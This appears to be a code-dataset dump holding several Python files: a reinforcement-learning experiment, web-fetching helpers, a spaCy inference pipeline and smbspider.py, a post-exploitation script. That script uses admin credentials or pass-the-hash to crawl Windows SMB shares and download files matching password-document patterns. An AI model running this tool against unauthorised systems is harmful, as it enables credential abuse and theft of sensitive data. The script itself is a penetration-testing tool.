Dataset columns (name, type, min/max; ⌀ marks columns that may contain nulls):

| column | type | min | max |
|---|---|---|---|
| hexsha | stringlengths | 40 | 40 |
| size | int64 | 5 | 2.06M |
| ext | stringclasses | 10 values | |
| lang | stringclasses | 1 value | |
| max_stars_repo_path | stringlengths | 3 | 248 |
| max_stars_repo_name | stringlengths | 5 | 125 |
| max_stars_repo_head_hexsha | stringlengths | 40 | 78 |
| max_stars_repo_licenses | listlengths | 1 | 10 |
| max_stars_count | int64 ⌀ | 1 | 191k |
| max_stars_repo_stars_event_min_datetime | stringlengths ⌀ | 24 | 24 |
| max_stars_repo_stars_event_max_datetime | stringlengths ⌀ | 24 | 24 |
| max_issues_repo_path | stringlengths | 3 | 248 |
| max_issues_repo_name | stringlengths | 5 | 125 |
| max_issues_repo_head_hexsha | stringlengths | 40 | 78 |
| max_issues_repo_licenses | listlengths | 1 | 10 |
| max_issues_count | int64 ⌀ | 1 | 67k |
| max_issues_repo_issues_event_min_datetime | stringlengths ⌀ | 24 | 24 |
| max_issues_repo_issues_event_max_datetime | stringlengths ⌀ | 24 | 24 |
| max_forks_repo_path | stringlengths | 3 | 248 |
| max_forks_repo_name | stringlengths | 5 | 125 |
| max_forks_repo_head_hexsha | stringlengths | 40 | 78 |
| max_forks_repo_licenses | listlengths | 1 | 10 |
| max_forks_count | int64 ⌀ | 1 | 105k |
| max_forks_repo_forks_event_min_datetime | stringlengths ⌀ | 24 | 24 |
| max_forks_repo_forks_event_max_datetime | stringlengths ⌀ | 24 | 24 |
| content | stringlengths | 5 | 2.06M |
| avg_line_length | float64 | 1 | 1.02M |
| max_line_length | int64 | 3 | 1.03M |
| alphanum_fraction | float64 | 0 | 1 |
| count_classes | int64 | 0 | 1.6M |
| score_classes | float64 | 0 | 1 |
| count_generators | int64 | 0 | 651k |
| score_generators | float64 | 0 | 1 |
| count_decorators | int64 | 0 | 990k |
| score_decorators | float64 | 0 | 1 |
| count_async_functions | int64 | 0 | 235k |
| score_async_functions | float64 | 0 | 1 |
| count_documentation | int64 | 0 | 1.04M |
| score_documentation | float64 | 0 | 1 |
hexsha: 12f6a69fd0573ee6b9b0a6c81a158a82f44d6769 | size: 6,480 | ext: py | lang: Python
max_stars:  playground/pets_dubins.py | pecey/mbrl-lib | ebca518b35a1370dbaede2a1c96fcde714bc5489 | ["MIT"] | count: null | events: null / null
max_issues: playground/pets_dubins.py | pecey/mbrl-lib | ebca518b35a1370dbaede2a1c96fcde714bc5489 | ["MIT"] | count: null | events: null / null
max_forks:  playground/pets_dubins.py | pecey/mbrl-lib | ebca518b35a1370dbaede2a1c96fcde714bc5489 | ["MIT"] | count: null | events: null / null
content:
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import torch
import omegaconf
import mbrl.env.continuous_dubins as dubins_env
import mbrl.env.reward_fns as reward_fns
import mbrl.env.termination_fns as termination_fns
import mbrl.models as models
import mbrl.planning as planning
import mbrl.util.common as common_util
import mbrl.util as util
def train_callback(_model, _total_calls, _epoch, tr_loss, val_score, _best_val):
train_losses.append(tr_loss)
val_scores.append(val_score.mean().item()) # this returns val score per ensemble model
def plot_graph(_axs, _frame, _text, _trial, _steps_trial, _all_rewards, force_update=False):
if not force_update and (_steps_trial % 10 != 0):
return
_axs.clear()
_axs.set_xlim([0, num_trials + .1])
_axs.set_ylim([0, 200])
_axs.set_xlabel("Trial")
_axs.set_ylabel("Trial reward")
_axs.plot(_all_rewards, 'bs-')
_text.set_text(f"Trial {_trial + 1}: {_steps_trial} steps")
if __name__ == "__main__":
mpl.rcParams.update({"font.size": 16})
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
noisy = False
seed = 0
env = dubins_env.ContinuousDubinsEnv(noisy)
env.seed(seed)
rng = np.random.default_rng(seed=seed)
generator = torch.Generator(device=device)
generator.manual_seed(seed)
obs_shape = env.observation_space.shape
act_shape = env.action_space.shape
    # This function allows the model to evaluate the true rewards given an observation
reward_fn = reward_fns.continuous_dubins
# This function allows the model to know if an observation should make the episode end
term_fn = termination_fns.continuous_dubins
trial_length = 200
num_trials = 10
ensemble_size = 5
# Everything with "???" indicates an option with a missing value.
# Our utility functions will fill in these details using the
# environment information
cfg_dict = {
# dynamics model configuration
"dynamics_model": {
"model": {
"_target_": "mbrl.models.GaussianMLP",
"device": device,
"num_layers": 3,
"ensemble_size": ensemble_size,
"hid_size": 200,
"use_silu": True,
"in_size": "???",
"out_size": "???",
"deterministic": False,
"propagation_method": "fixed_model"
}
},
# options for training the dynamics model
"algorithm": {
"learned_rewards": False,
"target_is_delta": True,
"normalize": True,
},
# these are experiment specific options
"overrides": {
"trial_length": trial_length,
"num_steps": num_trials * trial_length,
"model_batch_size": 32,
"validation_ratio": 0.05
}
}
cfg = omegaconf.OmegaConf.create(cfg_dict)
# Create a 1-D dynamics model for this environment
dynamics_model = common_util.create_one_dim_tr_model(cfg, obs_shape, act_shape)
# Create a gym-like environment to encapsulate the model
model_env = models.ModelEnv(env, dynamics_model, term_fn, reward_fn, generator=generator)
replay_buffer = common_util.create_replay_buffer(cfg, obs_shape, act_shape, rng=rng)
common_util.rollout_agent_trajectories(
env,
trial_length, # initial exploration steps
planning.RandomAgent(env),
{}, # keyword arguments to pass to agent.act()
replay_buffer=replay_buffer,
trial_length=trial_length
)
print("# samples stored", replay_buffer.num_stored)
agent_cfg = omegaconf.OmegaConf.create({
# this class evaluates many trajectories and picks the best one
"_target_": "mbrl.planning.TrajectoryOptimizerAgent",
"planning_horizon": 15,
"replan_freq": 1,
"verbose": False,
"action_lb": "???",
"action_ub": "???",
# this is the optimizer to generate and choose a trajectory
"optimizer_cfg": {
"_target_": "mbrl.planning.CEMOptimizer",
"num_iterations": 5,
"elite_ratio": 0.1,
"population_size": 500,
"alpha": 0.1,
"device": device,
"lower_bound": "???",
"upper_bound": "???",
"return_mean_elites": True
}
})
agent = planning.create_trajectory_optim_agent_for_model(
model_env,
agent_cfg,
num_particles=20
)
train_losses = []
val_scores = []
# Create a trainer for the model
model_trainer = models.ModelTrainer(dynamics_model, optim_lr=1e-3, weight_decay=5e-5)
# Create visualization objects
fig, axs = plt.subplots(1, 1, figsize=(14, 3.75))
ax_text = axs.text(300, 50, "")
# Main PETS loop
all_rewards = [0]
for trial in range(num_trials):
obs = env.reset()
agent.reset()
done = False
total_reward = 0.0
steps_trial = 0
while not done:
# --------------- Model Training -----------------
if steps_trial == 0:
dynamics_model.update_normalizer(replay_buffer.get_all()) # update normalizer stats
dataset_train, dataset_val = replay_buffer.get_iterators(
batch_size=cfg.overrides.model_batch_size,
val_ratio=cfg.overrides.validation_ratio,
train_ensemble=True,
ensemble_size=ensemble_size,
shuffle_each_epoch=True,
bootstrap_permutes=False, # build bootstrap dataset using sampling with replacement
)
model_trainer.train(
dataset_train, dataset_val=dataset_val, num_epochs=50, patience=50, callback=train_callback)
# --- Doing env step using the agent and adding to model dataset ---
next_obs, reward, done, _ = common_util.step_env_and_add_to_buffer(env, obs, agent, {}, replay_buffer)
obs = next_obs
total_reward += reward
steps_trial += 1
if steps_trial == trial_length:
break
all_rewards.append(total_reward)
env.save_trajectory(f"dubins_{trial}.png")
print(all_rewards)
plot_graph(axs, None, ax_text, trial, steps_trial, all_rewards, force_update=True)
# fig.savefig("dubins.png")
avg_line_length: 34.105263 | max_line_length: 114 | alphanum_fraction: 0.622531 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,828 | score_documentation: 0.282099
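The agent configuration in the file above parameterizes mbrl's CEMOptimizer with num_iterations, elite_ratio, population_size, alpha, and return_mean_elites. As a rough illustration of what those keys control, here is a generic cross-entropy-method sketch in NumPy; it is not mbrl's implementation, just the idea behind the config:

import numpy as np
def cem_sketch(cost_fn, lower, upper, num_iterations=5, population_size=500, elite_ratio=0.1, alpha=0.1, seed=0):
    """Generic CEM loop over a bounded decision variable (illustrative only)."""
    rng = np.random.default_rng(seed)
    mean = (np.asarray(lower) + np.asarray(upper)) / 2.0
    std = (np.asarray(upper) - np.asarray(lower)) / 4.0
    n_elite = max(1, int(population_size * elite_ratio))
    for _ in range(num_iterations):
        # Sample a population within the bounds and rank it by cost.
        samples = np.clip(rng.normal(mean, std, size=(population_size,) + mean.shape), lower, upper)
        costs = np.array([cost_fn(s) for s in samples])
        elites = samples[np.argsort(costs)[:n_elite]]
        # alpha smooths the update of the sampling distribution toward the elites.
        mean = alpha * mean + (1 - alpha) * elites.mean(axis=0)
        std = alpha * std + (1 - alpha) * elites.std(axis=0)
    return mean  # analogous to "return_mean_elites": True in the config above
# Example: minimize a quadratic over [-1, 1].
# best = cem_sketch(lambda a: float(np.sum(a ** 2)), np.array([-1.0]), np.array([1.0]))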
hexsha: 12f7704aea2bda946e46a42c6fdb1b32ab8e104a | size: 39 | ext: py | lang: Python
max_stars:  pixiv_spider/__init__.py | Uzukidd/Pixiv-spider | 10d21bf8f1e0ec0b0792383ae9e8ae55e77efd17 | ["MIT"] | count: 1 | events: 2021-11-12T19:16:56.000Z / 2021-11-12T19:16:56.000Z
max_issues: pixiv_spider/__init__.py | Uzukidd/Pixiv-web-crawler | 10d21bf8f1e0ec0b0792383ae9e8ae55e77efd17 | ["MIT"] | count: null | events: null / null
max_forks:  pixiv_spider/__init__.py | Uzukidd/Pixiv-web-crawler | 10d21bf8f1e0ec0b0792383ae9e8ae55e77efd17 | ["MIT"] | count: null | events: null / null
content:
# from pixiv_web_crawler import Getters
avg_line_length: 39 | max_line_length: 39 | alphanum_fraction: 0.871795 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 39 | score_documentation: 1
hexsha: 12f80c5f985c410a5af8bdf06f87e46b6aa396c4 | size: 1,241 | ext: py | lang: Python
max_stars:  parsers/parsers_base.py | xm4dn355x/async_test | 92e7ec6a693ff4850ed603c0f4f0fa83e63b4e49 | ["MIT"] | count: null | events: null / null
max_issues: parsers/parsers_base.py | xm4dn355x/async_test | 92e7ec6a693ff4850ed603c0f4f0fa83e63b4e49 | ["MIT"] | count: null | events: null / null
max_forks:  parsers/parsers_base.py | xm4dn355x/async_test | 92e7ec6a693ff4850ed603c0f4f0fa83e63b4e49 | ["MIT"] | count: null | events: null / null
content:
#
# Common helper functions shared by all parsers
#
# Author: Mikhail Nikitenko
# License: MIT License
#
from time import sleep
import requests
def get_htmls(urls):
    """
    Takes a list of URLs
    Returns a list of all fetched HTML documents
    :param urls: list of URLs
    :type urls: list
    :return: list of HTML documents
    """
    htmls = []  # prepare the list that will be returned
    for url in urls:  # go through every URL in the list
        html = get_html(url)  # fetch the HTML for the current URL
        htmls.append(html)  # add the fetched HTML to the result list
        sleep(1)
    return htmls  # return a list in which every element is an HTML document
def get_html(url):
    """
    Takes a URL
    Returns the body of the HTML document
    :param url: URL
    :type url: str
    :return: HTML document
    """
    print(f"""get_html url={url}""")
    r = requests.get(url, headers={'User-Agent': 'Custom'})  # request the web page at the given URL
    print(r)  # server response, e.g. <Response [200]>
    return r.text  # return the body of the HTML document
if __name__ == '__main__':
pass
avg_line_length: 27.577778 | max_line_length: 109 | alphanum_fraction: 0.654311 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,350 | score_documentation: 0.793184
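A short usage sketch for the helpers in the file above; the URLs are placeholders, and in the repository these functions would presumably be imported by the concrete parsers rather than run directly:

from parsers.parsers_base import get_htmls
# Placeholder URLs, for illustration only; get_htmls fetches each page in turn
# and sleeps one second between requests.
pages = get_htmls(["https://example.com", "https://example.org"])
print(len(pages), "HTML documents fetched")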
hexsha: 12f867945891bf95b1fd61c639ac565c8cecb9f9 | size: 16,303 | ext: py | lang: Python
max_stars:  smbspider/smbspider.py | vonahi/pentesting_scripts | 233b07a13e631cd121985465c083327f2fe372b6 | ["MIT"] | count: 13 | events: 2019-09-18T17:15:22.000Z / 2022-02-20T00:28:35.000Z
max_issues: smbspider/smbspider.py | vonahi/pentesting_scripts | 233b07a13e631cd121985465c083327f2fe372b6 | ["MIT"] | count: null | events: null / null
max_forks:  smbspider/smbspider.py | vonahi/pentesting_scripts | 233b07a13e631cd121985465c083327f2fe372b6 | ["MIT"] | count: 4 | events: 2019-07-24T10:03:41.000Z / 2021-11-22T06:19:54.000Z
content:
#!/usr/bin/python
#
# This post-exploitation script can be used to spider numerous systems
# to identify sensitive and/or confidential data. A good scenario to
# use this script is when you have admin credentials to tons of
# Windows systems, and you want to look for files containing data such
# as PII, network password documents, etc. For the most part,
# this script uses smbclient, parses the results, and prints
# out the results in a nice format for you.
#
# Author: Alton Johnson <alton@vonahi.io>
# Version: 2.4
# Updated: 01/23/2014
#
import commands, time, getopt, re, os
from sys import argv
start_time = time.time()
class colors:
red = "\033[1;31m"
blue = "\033[1;34m"
norm = "\033[0;00m"
green = "\033[1;32m"
banner = "\n " + "*" * 56
banner += "\n * _ *"
banner += "\n * | | // \\\\ *"
banner += "\n * ___ _ __ ___ | |__ _\\\\()//_ *"
banner += "\n * / __| '_ ` _ \| '_ \ / // \\\\ \ *"
banner += "\n * \__ \ | | | | | |_) | |\__/| *"
banner += "\n * |___/_| |_| |_|_.__/ *"
banner += "\n * *"
banner += "\n * SMB Spider v2.4, Alton Johnson (alton@vonahi.io) *"
banner += "\n " + "*" * 56 + "\n"
def help():
print banner
print " Usage: %s <OPTIONS>" % argv[0]
print colors.red + "\n Target(s) (required): \n" + colors.norm
print "\t -h <host>\t Provide IP address or a text file containing IPs."
print "\t\t\t Supported formats: IP, smb://ip/share, \\\\ip\\share\\"
print colors.red + "\n Credentials (required): \n" + colors.norm
print "\t -u <user>\t Specify a valid username to authenticate to the system(s)."
print "\t -p <pass>\t Specify the password which goes with the username."
print "\t -P <hash>\t Use -P to provide password hash if cleartext password isn't known."
print "\t -d <domain>\t If using a domain account, provide domain name."
print colors.green + "\n Shares (optional):\n" + colors.norm
print "\t -s <share>\t Specify shares (separate by comma) or specify \"profile\" to spider user profiles."
print "\t -f <file>\t Specify a list of shares from a file."
print colors.green + "\n Other (optional):\n" + colors.norm
print "\t -w \t\t Avoid verbose output. Output successful spider results to smbspider_host_share_user.txt."
print "\t\t\t This option is HIGHLY recommended if numerous systems are being scanned."
print "\t -n \t\t ** Ignore authentication check prior to spidering."
print "\t -g <file> \t Grab (download) files that match strings provided in text file. (Case sensitive.)"
print "\t\t\t ** Examples: *assword.doc, *assw*.doc, pass*.xls, etc."
print colors.norm
exit()
def start(argv):
if len(argv) < 1:
help()
try:
opts, args = getopt.getopt(argv, "u:p:d:h:s:f:P:wng:")
except getopt.GetoptError, err:
print colors.red + "\n [-] Error: " + str(err) + colors.norm
# set default variables to prevent errors later in script
sensitive_strings = []
smb_user = ""
smb_pass = ""
smb_domain = ""
smb_host = []
smb_share = ["profile"]
pth = False
output = False
unique_systems = []
ignorecheck = False
inputfile = False
#parse through arguments
for opt, arg in opts:
if opt == "-u":
smb_user = arg
elif opt == "-p":
smb_pass = arg
elif opt == "-d":
smb_domain = arg
elif opt == "-h":
try:
smb_host = open(arg).read().split('\n')
inputfile = True
except:
if "\\\\" in arg and "\\" not in arg[-1:]:
test = arg[2:].replace("\\","\\")
smb_host.append("\\\\%s\\" % test)
else:
smb_host.append(arg)
elif opt == "-f":
smb_share = open(arg).read().split()
elif opt == "-s":
smb_share = arg.split(',')
elif opt == "-P":
if arg[-3:] == ":::":
arg = arg[:-3]
smb_pass = arg
pth = True
elif opt == "-w":
output = True
elif opt == "-n":
ignorecheck = True
elif opt == "-g":
sensitive_strings = open(arg).read().split("\n")[:-1]
#check options before proceeding
if (not smb_user or not smb_pass or not smb_host):
print colors.red + "\n [-] " + colors.norm + "Error: Please check to ensure that all required options are provided."
help()
if pth:
result = commands.getoutput("pth-smbclient")
if "not found" in result.lower():
print colors.red + "\n [-] " + colors.norm + "Error: The passing-the-hash package was not found. Therefore, you cannot pass hashes."
print "Please run \"apt-get install passing-the-hash\" to fix this error and try running the script again.\n"
exit()
#make smb_domain, smb_user, and smb_pass one variable
if smb_domain:
credentials = smb_domain + "\\\\" + smb_user + " " + smb_pass
else:
credentials = smb_user + " " + smb_pass
for system in smb_host:
if "\\" in system or "//" in system:
if "\\" in system:
sys = system[system.find("\\")+2:]
sys = sys[:sys.find("\\")]
else:
sys = system[system.find("/")+2:]
sys = sys[:sys.find("/")]
if sys not in unique_systems:
unique_systems.append(sys)
else:
unique_systems.append(system)
#start spidering
print banner
unique_systems = [i for i in unique_systems if i != ''] #remove blank elements from list
print " [*] Spidering %s system(s)..." % len(unique_systems)
begin = spider(credentials, smb_host, smb_share, pth, output, ignorecheck, inputfile, sensitive_strings)
begin.start_spidering()
class spider:
def __init__(self, credentials, hosts, shares, pth, output, ignorecheck, inputfile, sensitive_strings):
self.list_of_hosts = hosts
self.list_of_shares = shares
self.credentials = credentials
self.smb_host = ""
self.smb_share = ""
self.skip_host = ""
self.pth = pth
self.outputfile = output
self.blacklisted = []
self.ignorecheck = ignorecheck
self.inputfile = inputfile
self.smb_download = True
self.file_locations = []
self.sensitive_strings = sensitive_strings
self.profile = False
def start_spidering(self):
share = ""
self.total_hosts = 0
empty_share_error = colors.red + " [-] " + colors.norm + "Error: Empty share detected for host %s. Skipping share."
for test_host in self.list_of_hosts:
temp = test_host
if ("//" in temp or "\\\\" in temp) and self.list_of_shares[0] != "profile":
print colors.red + " [-] " + colors.norm + "Error: You cannot specify a share if your target(s) contains \\\\<ip>\\<share> or //<ip>/<share>\n"
exit()
for host in self.list_of_hosts:
self.total_hosts += 1
tmp_share = host.replace("/","")
tmp_share = host.replace("\\","")
orig_host = host # ensures that we can check the original host value later on if we need to
if "\\\\" in host: # this checks to see if host is in the format of something like \\192.168.0.1\C$
host = host[2:]
host = host[:host.find("\\")]
elif "smb://" in host: # this checks to see if the host contains a format such as smb://192.168.0.1/C$
host = host[6:]
host = host[:host.find("/")]
if self.skip_host == host:
self.blacklisted.append(host)
continue
if len(self.list_of_shares) == 1 and ("//" in orig_host or "\\\\" in orig_host):
if "//" in orig_host:
share = orig_host[orig_host.rfind("/")+1:]
elif "\\\\" in orig_host:
if orig_host[-1] == "\\":
temp = orig_host[:-1]
share = temp[temp.rfind("\\")+1:]
self.smb_host = host
self.smb_share = share
else:
for share in self.list_of_shares:
if self.skip_host == host:
self.blacklisted.append(host)
break
self.smb_host = host
self.smb_share = share
tmp_share = tmp_share.replace(self.smb_host,"")
tmp_share = tmp_share.replace("smb:///","")
if len(tmp_share) == 0 and (self.smb_share != "profile" and len(self.smb_share) == 0):
print empty_share_error % self.smb_host
continue
if len(self.list_of_shares) > 1:
for x in self.list_of_shares:
self.smb_share = x
print "\n [*] Attempting to spider smb://%s/%s" % (self.smb_host, self.smb_share.replace("profile","<user profiles>"))
self.spider_host()
else:
print "\n [*] Attempting to spider smb://%s/%s " % (self.smb_host, self.smb_share.replace("profile","<user profiles>"))
self.spider_host()
if self.list_of_shares[0] == "profile":
if self.inputfile:
print " [*] Finished with smb://%s/<user profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts-1))
else:
print " [*] Finished with smb://%s/<user profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts))
else:
print " [*] Finished with smb://%s/%s. [Remaining: %s] " % (self.smb_host, self.smb_share, str(len(self.list_of_hosts)-self.total_hosts))
if self.smb_download: self.start_downloading()
def start_downloading(self):
if len(self.sensitive_strings) == 0: return
print "\n" + colors.blue + " [*] " + colors.norm + "Attempting to download files that were deemed sensitive."
if not os.path.exists('smbspider-downloads'):
os.makedirs('smbspider-downloads')
for f in self.file_locations:
host = f[2:]
host = str(host[:host.find("\\")])
share = f[len(host)+3:]
share = share[:share.find("\\")]
full_path = f.replace("\\\\%s\\%s\\" % (host, share), "").strip()
file_name = full_path[full_path.rfind("\\")+1:]
for s in self.sensitive_strings:
if s in file_name:
result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \
host,file_name, host, share, self.credentials))
print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share)
commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s\"" % (host, file_name, host, file_name))
else:
temp_file = s.split("*")
all_match = 0
for tmp in temp_file:
if tmp in full_path:
all_match = 1
else:
all_match = 0
break
if all_match == 1:
result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \
host,file_name, host, share, self.credentials))
print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share)
commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s_%s\"" % (host, file_name, host, file_name))
def parse_result(self, result):
############################################################
# this small section removes all of the unnecessary crap. a bit ugly, i know! :x
errors = ["O_SUCH_F","ACCESS_DEN",
"US_OBJECT_NAME_IN", "US_INVALID_NETWORK_RE", "CT_NAME_NOT",
"not present","CONNECTION_REFUSED"
]
result = result.split('\n')
purge = []
trash = [" . ", " .. ", "Domain=", " D", "blocks of size",
"wrapper called", "Substituting user supplied"]
for num in range(0,len(result)):
for d in trash:
if d in result[num] or len(result[num]) < 2:
purge.append(num)
purge = list(set(purge))
purge = sorted(purge, reverse=True)
for i in purge:
del result[i]
############################################################
directory = ""
filename = ""
file_locations = []
file_change = False
for x in result:
if x[0] == "\\":
directory = x
file_change = False
else:
filename = x[2:]
filename = filename[:filename.find(" ")]
file_change = True
fail = 0
if not file_change: continue
for error in errors:
if error in filename:
fail = 1
if fail == 0 and len(filename) > 0:
if not self.outputfile:
file_complete_path = "\\\\%s\%s" % (self.smb_host,self.smb_share) + directory + "\\" + filename
print colors.blue + " [*] " + colors.norm + file_complete_path
else:
if not os.path.exists('smbspider'):
os.makedirs('smbspider')
if self.profile:
lawl_share = "profile"
else:
lawl_share = self.smb_share
output = open("smbspider/smbspider_%s_%s_%s.txt" % (self.smb_host, lawl_share, self.credentials.split()[0]), 'a')
file_complete_path = colors.blue + " [*] " + colors.norm + "\\\\%s\%s" % (self.smb_host,lawl_share) + directory + "\\" + filename + "\n"
output.write(file_complete_path)
output.close()
if self.smb_download:
self.file_locations.append(file_complete_path[file_complete_path.find("\\\\"):])
def fingerprint_fs(self):
result = commands.getoutput("%s -c \"ls Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)).split()
if self.check_errors(result[-1]):
return "error"
if "NT_STATUS_OBJECT_NAME_NOT_FOUND" in result:
return "old"
else:
return "new"
def find_users(self, result):
result = result.split('\n')
purge = []
users = []
for num in range(0,len(result)): # cleans some stuff up a bit.
if " . " in result[num] or " .. " in result[num] or "Domain=" in result[num]\
or len(result[num]) < 2 or "blocks of size" in result[num]:
purge.append(num)
purge = sorted(purge, reverse=True)
for i in purge:
del result[i]
#clean up users list a little bit
for i in result:
user = i[:i.find(" D")]
user = user[2:user.rfind(re.sub(r'\W+', '', user)[-1])+1]
users.append(user)
return users
def check_errors(self, result):
access_error = {
"UNREACHABLE":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host,
"UNSUCCESSFUL":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host,
"TIMEOUT":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host,
"LOGON_SERVER":" [-] Error %s Cannot contact logon server. Skipping host." % self.smb_host
}
for err in access_error:
if err in result:
print colors.red + access_error[err] + colors.norm
self.skip_host = self.smb_host
return True
if "LOGON_FAIL" in result.split()[-1] and not self.ignorecheck:
print colors.red + " [-] " + colors.norm + "Error [%s]: Invalid credentials. Please correct credentials and try again." % self.smb_host
exit()
elif "ACCESS_DENIED" in result.split()[-1]:
print colors.red + " [-] " + colors.norm + "Error [%s]: Valid credentials, but no access. Try another account." % self.smb_host
elif "BAD_NETWORK" in result.split()[-1] or "CONNECTION_REFUSED" in result.split()[-1]:
print colors.red + " [-] " + colors.norm + "Error: Invalid share -> smb://%s/%s" % (self.smb_host,self.smb_share)
return True
def smbclient(self):
if self.pth:
return "pth-smbclient"
else:
return "smbclient"
def spider_host(self):
if self.smb_share.lower() == "profile":
self.smb_share = "C$"
self.profile = True
if self.fingerprint_fs() == "error":
return
elif self.fingerprint_fs() == "old":
folders = ['My Documents','Desktop','Documents']
result = commands.getoutput("%s -c \"ls \\\"Documents and Settings\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials))
if self.check_errors(result):
return
users = self.find_users(result)
for user in users:
for folder in folders:
result = commands.getoutput("%s -c \"recurse;ls \\\"Documents and Settings\\%s\\%s\" //%s/C$ -U %s"\
% (self.smbclient(), user, folder, self.smb_host, self.credentials))
self.parse_result(result)
else:
folders = ['Documents','Desktop','Music','Videos','Downloads','Pictures']
result = commands.getoutput("%s -c \"ls \\\"Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials))
if self.check_errors(result):
return
users = self.find_users(result)
for user in users:
for folder in folders:
result = commands.getoutput("%s -c \"recurse;ls \\\"Users\\%s\\%s\" //%s/C$ -U %s" % (self.smbclient(), user, folder, self.smb_host, self.credentials))
self.parse_result(result)
else:
result = commands.getoutput("%s -c \"recurse;ls\" \"//%s/%s\" -U %s" % (self.smbclient(), self.smb_host, self.smb_share, self.credentials))
if self.check_errors(result):
return
self.parse_result(result)
if __name__ == "__main__":
try:
start(argv[1:])
except KeyboardInterrupt:
print "\nExiting. Interrupted by user (ctrl-c)."
exit()
except Exception, err:
print err
exit()
print "\n-----"
print "Completed in: %.1fs" % (time.time() - start_time)
avg_line_length: 38.541371 | max_line_length: 157 | alphanum_fraction: 0.626326 | count_classes: 10,829 | score_classes: 0.664234 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 5,905 | score_documentation: 0.362203
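Going by the options documented in the script's help() above, an invocation might look like the lines below; every host, credential, and share value is a placeholder, not taken from the repository (note the script is written for Python 2):

# Hypothetical invocations (placeholder hosts, credentials, and shares):
#   python smbspider.py -h hosts.txt -u administrator -p 'Winter2014!' -d CORP -s C$,D$ -w
#   python smbspider.py -h 192.168.1.10 -u administrator -P <NTLM hash> -s profile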
hexsha: 12fad400aa5ee6c8bf4a6f0d061c8bf3df14fbb1 | size: 1,675 | ext: py | lang: Python
max_stars:  api-inference-community/docker_images/spacy/app/pipelines/text_classification.py | mlonaws/huggingface_hub | 588f74b98fbcab2cd7e61a74cc6d9649a92e0ef2 | ["Apache-2.0"] | count: 362 | events: 2020-12-22T10:24:06.000Z / 2022-03-30T22:47:25.000Z
max_issues: api-inference-community/docker_images/spacy/app/pipelines/text_classification.py | mlonaws/huggingface_hub | 588f74b98fbcab2cd7e61a74cc6d9649a92e0ef2 | ["Apache-2.0"] | count: 547 | events: 2020-12-24T13:35:57.000Z / 2022-03-31T17:32:42.000Z
max_forks:  api-inference-community/docker_images/spacy/app/pipelines/text_classification.py | mlonaws/huggingface_hub | 588f74b98fbcab2cd7e61a74cc6d9649a92e0ef2 | ["Apache-2.0"] | count: 98 | events: 2021-01-06T17:37:09.000Z / 2022-03-29T07:20:08.000Z
content:
import os
import subprocess
import sys
from typing import Dict, List
from app.pipelines import Pipeline
class TextClassificationPipeline(Pipeline):
def __init__(
self,
model_id: str,
):
# At the time, only public models from spaCy are allowed in the inference API.
full_model_path = model_id.split("/")
if len(full_model_path) != 2:
raise ValueError(
f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)"
)
namespace, model_name = full_model_path
package = f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl"
cache_dir = os.environ["PIP_CACHE"]
subprocess.check_call(
[sys.executable, "-m", "pip", "install", "--cache-dir", cache_dir, package]
)
import spacy
self.model = spacy.load(model_name)
def __call__(self, inputs: str) -> List[List[Dict[str, float]]]:
"""
Args:
inputs (:obj:`str`):
a string containing some text
Return:
            A :obj:`list`:. The object returned should be a list of one list like [[{"label": "POSITIVE", "score": 0.9939950108528137}]] containing :
- "label": A string representing what the label/class is. There can be multiple labels.
- "score": A score between 0 and 1 describing how confident the model is for this label/class.
"""
doc = self.model(inputs)
categories = []
for cat, score in doc.cats.items():
categories.append({"label": cat, "score": score})
return [categories]
avg_line_length: 34.895833 | max_line_length: 128 | alphanum_fraction: 0.601791 | count_classes: 1,567 | score_classes: 0.935522 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 788 | score_documentation: 0.470448
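A hedged usage sketch for the pipeline above: the model id is a placeholder of the namespace/model_name form the constructor expects, the import path simply mirrors the file's location, and PIP_CACHE must point at a writable directory because __init__ reads it from the environment before pip-installing the model wheel.

import os
os.environ.setdefault("PIP_CACHE", "/tmp/pip-cache")  # required by __init__
from app.pipelines.text_classification import TextClassificationPipeline
# "some-user/some_spacy_textcat_model" is a hypothetical model id.
pipe = TextClassificationPipeline(model_id="some-user/some_spacy_textcat_model")
print(pipe("I really enjoyed this film."))  # -> [[{"label": "...", "score": ...}, ...]]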
hexsha: 12fb3b1f1de02a4bb72cea078775fd6a9b6cb1ac | size: 4,867 | ext: py | lang: Python
